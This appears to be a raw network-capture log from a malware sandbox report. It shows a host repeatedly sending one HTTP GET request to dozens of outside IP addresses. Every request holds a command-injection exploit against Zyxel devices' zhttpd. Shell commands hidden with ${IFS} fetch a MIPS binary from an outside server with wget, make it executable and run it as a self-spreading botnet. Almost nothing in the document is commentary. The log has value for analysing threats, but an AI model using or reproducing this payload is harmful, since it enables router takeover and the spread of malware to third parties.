                                                  Jan 19, 2024 18:23:43.801556110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1479192.168.2.1343542175.213.49.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801590919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1480192.168.2.134099443.20.187.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801624060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1481192.168.2.1342874164.163.32.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801651955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1482192.168.2.1344558195.162.138.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801698923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1483192.168.2.1342470116.73.203.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801728010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1484192.168.2.135749082.99.196.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801760912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1485192.168.2.1355390220.48.172.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801798105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1486192.168.2.1346656133.108.85.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801853895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1487192.168.2.135910461.159.233.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801935911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1488192.168.2.1355696155.22.51.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801935911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1489192.168.2.134359282.141.216.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801953077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1490192.168.2.1336110205.237.27.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.801983118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1491192.168.2.1360370126.156.167.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802009106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1492192.168.2.133383462.91.154.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802037001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1493192.168.2.134345487.82.250.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802100897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1494192.168.2.1343748105.99.230.11443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802138090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1495192.168.2.1357290101.224.99.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802165985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1496192.168.2.1348750210.61.2.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802242994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1497192.168.2.134486094.36.132.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802268028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1498192.168.2.135003420.26.1.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802315950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1499192.168.2.1349026205.237.47.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802351952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1500192.168.2.135951278.78.119.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802386999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1501192.168.2.1358532209.92.175.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802455902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1502192.168.2.13367801.21.202.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802474976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1503192.168.2.13557824.202.48.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802514076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1504192.168.2.1354796142.216.136.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802566051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1505192.168.2.1353362204.218.193.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802601099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1506192.168.2.134416882.164.209.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802644014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1507192.168.2.1339200166.147.28.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802700996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1508192.168.2.133645671.69.245.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802727938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1509192.168.2.133984475.160.220.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802761078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1510192.168.2.1339502197.19.45.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802800894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1511192.168.2.1339734172.246.36.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802850962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1512192.168.2.1360330119.9.117.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802895069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1513192.168.2.1357698106.120.105.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802927971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1514192.168.2.13416805.201.207.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802933931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1515192.168.2.135827892.130.75.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.802999020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1516192.168.2.1345616186.8.119.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803030014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1517192.168.2.135295278.252.68.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803073883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1518192.168.2.134609646.23.73.32443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803097010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1519192.168.2.135850458.25.218.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803133011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1520192.168.2.1357342109.186.184.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803184986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1521192.168.2.134842079.148.8.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803214073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1522192.168.2.1356676104.216.201.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803244114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1523192.168.2.1341224175.28.246.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803289890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1524192.168.2.1347444216.0.225.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803332090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1525192.168.2.134971899.239.122.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803364992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1526192.168.2.1335588223.56.131.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803416014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1527192.168.2.1336322177.155.149.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803446054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1528192.168.2.1347586149.22.6.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803500891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1529192.168.2.134379281.205.188.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803533077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1530192.168.2.1344846196.170.176.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803567886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1531192.168.2.1353096123.239.115.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803603888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1532192.168.2.1336848102.20.180.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803663015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1533192.168.2.134068220.97.75.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803709030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1534192.168.2.135741845.199.244.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803744078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1535192.168.2.1334142154.156.35.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803777933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1536192.168.2.1335414221.62.177.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803831100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1537192.168.2.133280892.206.206.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803858042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1538192.168.2.1341874183.205.95.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803893089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1539192.168.2.133399272.87.147.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803936958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1540192.168.2.1340460124.238.17.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:43.803966045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1541192.168.2.1355862220.116.49.74443
                                                  TimestampBytes transferredDirectionData
